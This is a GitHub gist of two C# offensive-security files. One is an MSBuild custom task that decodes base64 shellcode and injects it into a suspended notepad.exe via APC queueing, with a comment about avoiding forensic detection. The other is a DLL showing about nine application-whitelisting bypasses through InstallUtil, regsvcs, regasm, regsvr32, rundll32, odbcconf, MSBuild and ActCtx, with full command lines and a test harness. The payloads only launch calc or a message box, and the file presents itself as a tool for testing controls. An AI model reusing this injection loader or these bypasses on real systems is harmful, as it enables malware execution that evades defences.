Last active
November 16, 2023 07:20
-
-
Save decay88/8009c041d411a4f9b4e397479edc2e25 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="MyTarget"> | |
| <SimpleTask MyProperty="My voice is my passport." | |
| MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA" | |
| MyProcess="C:\Windows\notepad.exe"/> | |
| </Target> | |
| <UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" /> | |
| </Project> | |
| */ | |
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Build.Framework; | |
| using Microsoft.Build.Utilities; | |
| // C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /reference:"Microsoft.Build.Framework.dll";"Microsoft.Build.Tasks.v4.0.dll";"Microsoft.Build.Utilities.v4.0.dll" /target:library C:\Users\mobile\AllIDoIsWinWinWin.cs | |
| namespace MyTasks | |
| { | |
| public class SimpleTask : Task | |
| { | |
| public override bool Execute() | |
| { | |
| Console.WriteLine(this.MyProcess); | |
| Console.WriteLine(this.MyProperty); | |
| ApcInjectionNewProcess.Exec(this.MyCode,this.MyProcess); | |
| return true; | |
| } | |
| public string MyProperty { get; set; } | |
| public string MyCode { get; set; } | |
| public string MyProcess { get; set; } | |
| } | |
| } | |
| public class ApcInjectionNewProcess | |
| { | |
| public static void Exec(string a, string b) | |
| { | |
| byte[] shellcode = System.Convert.FromBase64String(a); | |
| // Target process to inject into | |
| string processpath = b;//@"C:\Windows\notepad.exe"; | |
| STARTUPINFO si = new STARTUPINFO(); | |
| PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); | |
| // Create new process in suspended state to inject into | |
| bool success = CreateProcess(processpath, null, | |
| IntPtr.Zero, IntPtr.Zero, false, | |
| ProcessCreationFlags.CREATE_SUSPENDED, | |
| IntPtr.Zero, null, ref si, out pi); | |
| // Allocate memory within process and write shellcode | |
| IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length,MEM_COMMIT, PAGE_READWRITE); | |
| IntPtr bytesWritten = IntPtr.Zero; | |
| bool resultBool = WriteProcessMemory(pi.hProcess,resultPtr,shellcode,shellcode.Length, out bytesWritten); | |
| // Open thread | |
| IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); | |
| uint oldProtect = 0; | |
| // Modify memory permissions on allocated shellcode | |
| resultBool = VirtualProtectEx(pi.hProcess,resultPtr, shellcode.Length,PAGE_EXECUTE_READ, out oldProtect); | |
| // Assign address of shellcode to the target thread apc queue | |
| IntPtr ptr = QueueUserAPC(resultPtr,sht,IntPtr.Zero); | |
| IntPtr ThreadHandle = pi.hThread; | |
| ResumeThread(ThreadHandle); | |
| } | |
| private static UInt32 MEM_COMMIT = 0x1000; | |
| private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; //I'm not using this #DFIR ;-) | |
| private static UInt32 PAGE_READWRITE = 0x04; | |
| private static UInt32 PAGE_EXECUTE_READ = 0x20; | |
| [Flags] | |
| public enum ProcessAccessFlags : uint | |
| { | |
| All = 0x001F0FFF, | |
| Terminate = 0x00000001, | |
| CreateThread = 0x00000002, | |
| VirtualMemoryOperation = 0x00000008, | |
| VirtualMemoryRead = 0x00000010, | |
| VirtualMemoryWrite = 0x00000020, | |
| DuplicateHandle = 0x00000040, | |
| CreateProcess = 0x000000080, | |
| SetQuota = 0x00000100, | |
| SetInformation = 0x00000200, | |
| QueryInformation = 0x00000400, | |
| QueryLimitedInformation = 0x00001000, | |
| Synchronize = 0x00100000 | |
| } | |
| [Flags] | |
| public enum ProcessCreationFlags : uint | |
| { | |
| ZERO_FLAG = 0x00000000, | |
| CREATE_BREAKAWAY_FROM_JOB = 0x01000000, | |
| CREATE_DEFAULT_ERROR_MODE = 0x04000000, | |
| CREATE_NEW_CONSOLE = 0x00000010, | |
| CREATE_NEW_PROCESS_GROUP = 0x00000200, | |
| CREATE_NO_WINDOW = 0x08000000, | |
| CREATE_PROTECTED_PROCESS = 0x00040000, | |
| CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, | |
| CREATE_SEPARATE_WOW_VDM = 0x00001000, | |
| CREATE_SHARED_WOW_VDM = 0x00001000, | |
| CREATE_SUSPENDED = 0x00000004, | |
| CREATE_UNICODE_ENVIRONMENT = 0x00000400, | |
| DEBUG_ONLY_THIS_PROCESS = 0x00000002, | |
| DEBUG_PROCESS = 0x00000001, | |
| DETACHED_PROCESS = 0x00000008, | |
| EXTENDED_STARTUPINFO_PRESENT = 0x00080000, | |
| INHERIT_PARENT_AFFINITY = 0x00010000 | |
| } | |
| public struct PROCESS_INFORMATION | |
| { | |
| public IntPtr hProcess; | |
| public IntPtr hThread; | |
| public uint dwProcessId; | |
| public uint dwThreadId; | |
| } | |
| public struct STARTUPINFO | |
| { | |
| public uint cb; | |
| public string lpReserved; | |
| public string lpDesktop; | |
| public string lpTitle; | |
| public uint dwX; | |
| public uint dwY; | |
| public uint dwXSize; | |
| public uint dwYSize; | |
| public uint dwXCountChars; | |
| public uint dwYCountChars; | |
| public uint dwFillAttribute; | |
| public uint dwFlags; | |
| public short wShowWindow; | |
| public short cbReserved2; | |
| public IntPtr lpReserved2; | |
| public IntPtr hStdInput; | |
| public IntPtr hStdOutput; | |
| public IntPtr hStdError; | |
| } | |
| [Flags] | |
| public enum ThreadAccess : int | |
| { | |
| TERMINATE = (0x0001) , | |
| SUSPEND_RESUME = (0x0002) , | |
| GET_CONTEXT = (0x0008) , | |
| SET_CONTEXT = (0x0010) , | |
| SET_INFORMATION = (0x0020) , | |
| QUERY_INFORMATION = (0x0040) , | |
| SET_THREAD_TOKEN = (0x0080) , | |
| IMPERSONATE = (0x0100) , | |
| DIRECT_IMPERSONATION = (0x0200) | |
| } | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| public static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, | |
| int dwThreadId); | |
| [DllImport("kernel32.dll",SetLastError = true)] | |
| public static extern bool WriteProcessMemory( | |
| IntPtr hProcess, | |
| IntPtr lpBaseAddress, | |
| byte[] lpBuffer, | |
| int nSize, | |
| out IntPtr lpNumberOfBytesWritten); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); | |
| [DllImport("kernel32")] | |
| public static extern IntPtr VirtualAlloc(UInt32 lpStartAddr, | |
| Int32 size, UInt32 flAllocationType, UInt32 flProtect); | |
| [DllImport("kernel32.dll", SetLastError = true )] | |
| public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, | |
| Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| public static extern IntPtr OpenProcess( | |
| ProcessAccessFlags processAccess, | |
| bool bInheritHandle, | |
| int processId | |
| ); | |
| [DllImport("kernel32.dll")] | |
| public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes,bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment,string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); | |
| [DllImport("kernel32.dll")] | |
| public static extern uint ResumeThread(IntPtr hThread); | |
| [DllImport("kernel32.dll")] | |
| public static extern uint SuspendThread(IntPtr hThread); | |
| [DllImport("kernel32.dll")] | |
| public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, | |
| int dwSize, uint flNewProtect, out uint lpflOldProtect); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using System.EnterpriseServices; | |
| using System.Windows.Forms; | |
| using Microsoft.Build.Framework; | |
| using Microsoft.Build.Utilities; | |
| using RGiesecke.DllExport; | |
| // You will need Visual Studio and UnmanagedExports to build this binary | |
| // Install-Package UnmanagedExports -Version 1.2.7 | |
| // Project must be built with a specific architecure setting x86 /x64 | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| For Testing Binary Application Whitelisting Controls | |
| Includes 7 Known Application Whitelisting/ Application Control Bypass Techniques in One File. | |
| 1. InstallUtil.exe | |
| 2. Regsvcs.exe | |
| 3. Regasm.exe | |
| 4. regsvr32.exe | |
| 5. rundll32.exe | |
| 6. odbcconf.exe | |
| 7. regsvr32 with params | |
| 8. DllGetClassObject - Load and Execute via ACTCTX | |
| 9. MSbuild Custom Task Exporter | |
| Usage: | |
| 1. | |
| x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | |
| x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | |
| 2. | |
| x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | |
| x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | |
| 3. | |
| x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll | |
| x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | |
| 4. | |
| regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer | |
| regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer | |
| 5. | |
| rundll32 AllTheThings.dll,EntryPoint | |
| 6. | |
| odbcconf.exe /s /a { REGSVR AllTheThings.dll } | |
| 7. | |
| regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll | |
| 8. cscript.exe AllTheThings.js | |
| // BEGIN AlltheThings.js | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="2.2.0.0"/> <file name="AllTheThings.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>'; | |
| var fso = new ActiveXObject("Scripting.FileSystemObject"); | |
| new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319'; | |
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = "C:\\Tools"; | |
| var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); | |
| ax.ManifestText = manifest; | |
| var DWX = ax.CreateObject("AllTheThings"); | |
| //END | |
| 9. Create XML File: | |
| AllTheThings.XML | |
| //BEGIN AllTheThings.XML | |
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="MyTarget"> | |
| <SimpleTask MyProperty="My voice is my passport."/> | |
| </Target> | |
| <UsingTask TaskName="SimpleTask" AssemblyFile="AlltheThings.dll" /> | |
| </Project> | |
| //END | |
| // Files | |
| x64 | |
| x86 | |
| Sample Harness.Bat | |
| [Begin] | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll | |
| regsvr32 /s /u AllTheThings.dll | |
| regsvr32 /s AllTheThings.dll | |
| rundll32 AllTheThings.dll,EntryPoint | |
| odbcconf.exe /a { REGSVR AllTheThings.dll } | |
| regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThings.dll | |
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSbuild.exe AllTheThings.xml | |
| [End] | |
| */ | |
| [assembly: ApplicationActivation(ActivationOption.Server)] | |
| [assembly: ApplicationAccessControl(false)] | |
| public class Program | |
| { | |
| public static void Main() | |
| { | |
| Console.WriteLine("Hello From Main...I Don't Do Anything"); | |
| //Add any behaviour here to throw off sandbox execution/analysts :) | |
| } | |
| } | |
| public class Thing0 | |
| { | |
| public static void Exec() | |
| { | |
| ProcessStartInfo startInfo = new ProcessStartInfo(); | |
| startInfo.FileName = "calc.exe"; | |
| Process.Start(startInfo); | |
| } | |
| public static void ExecParam(string a) | |
| { | |
| MessageBox.Show(a); | |
| } | |
| } | |
| [System.ComponentModel.RunInstaller(true)] | |
| public class Thing1 : System.Configuration.Install.Installer | |
| { | |
| //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary. | |
| public override void Uninstall(System.Collections.IDictionary savedState) | |
| { | |
| Console.WriteLine("Hello There From Uninstall"); | |
| Thing0.Exec(); | |
| } | |
| } | |
| [ComVisible(true)] | |
| [Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")] | |
| [ClassInterface(ClassInterfaceType.None)] | |
| [ProgId("dllguest.Bypass")] | |
| [Transaction(TransactionOption.Required)] | |
| public class Bypass : ServicedComponent | |
| { | |
| public Bypass() { Console.WriteLine("I am a basic COM Object"); } | |
| [ComRegisterFunction] //This executes if registration is successful | |
| public static void RegisterClass(string key) | |
| { | |
| Console.WriteLine("I shouldn't really execute"); | |
| Thing0.Exec(); | |
| } | |
| [ComUnregisterFunction] //This executes if registration fails | |
| public static void UnRegisterClass(string key) | |
| { | |
| Console.WriteLine("I shouldn't really execute either."); | |
| Thing0.Exec(); | |
| } | |
| public void Exec() { Thing0.Exec(); } | |
| } | |
| namespace MyTasks | |
| { | |
| public class SimpleTask : Task | |
| { | |
| public override bool Execute() | |
| { | |
| Thing0.Exec(); | |
| Console.WriteLine(this.MyProperty); | |
| return true; | |
| } | |
| public string MyProperty { get; set; } | |
| } | |
| } | |
| class Exports | |
| { | |
| // | |
| // | |
| //rundll32 entry point | |
| [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)] | |
| public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow) | |
| { | |
| Thing0.Exec(); | |
| } | |
| [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)] | |
| public static bool DllRegisterServer() | |
| { | |
| Thing0.Exec(); | |
| return true; | |
| } | |
| [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)] | |
| public static bool DllUnregisterServer() | |
| { | |
| Thing0.Exec(); | |
| return true; | |
| } | |
| [DllExport("DllInstall", CallingConvention = CallingConvention.StdCall)] | |
| public static void DllInstall(bool bInstall, IntPtr a) | |
| { | |
| string b = Marshal.PtrToStringUni(a); | |
| Thing0.ExecParam(b); | |
| } | |
| [DllExport("DllGetClassObject", CallingConvention = CallingConvention.StdCall)] | |
| public static uint DllGetClassObject(IntPtr rclsid, IntPtr riid, ref IntPtr ppv ) | |
| { | |
| Thing0.Exec(); | |
| ppv = rclsid; //Just random, don't really care lol | |
| return 0x00000000; | |
| } | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment